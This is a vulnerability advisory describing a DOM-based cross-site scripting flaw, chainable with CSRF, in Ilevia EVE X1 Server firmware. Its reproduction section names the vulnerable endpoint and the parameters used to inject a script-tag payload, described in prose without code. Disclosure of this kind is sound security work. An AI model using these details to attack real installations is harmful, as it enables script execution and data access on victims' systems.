Ilevia EVE X1 Server Cross-Site Scripting Vulnerability

A cross-site scripting (XSS) vulnerability has been identified in Ilevia EVE X1 Server firmware versions through 4.7.18.0.eden and logic versions through 6.00 - 2025_07_21. This vulnerability allows remote attackers to execute arbitrary code by exploiting the '/index.php' component. The issue arises from improper input neutralization during web page generation, creating a DOM-based XSS that, when combined with cross-site request forgery (CSRF), can access internal system data and execute JavaScript code.

Impact

Exploitation of this vulnerability could lead to cross-site scripting, allowing for the execution of malicious scripts in the context of the user's browser.

Reproduction

To reproduce this vulnerability, send a POST request to '/ajax/php/bh_web_backend.php' with the 'a' parameter set to 'r' and the 'p' parameter containing a crafted payload that includes a script tag. This request can be made manually or through a form that submits the same data. The presence of CSRF can be leveraged by including the request in a page that the user is likely to visit, such as a personal homepage.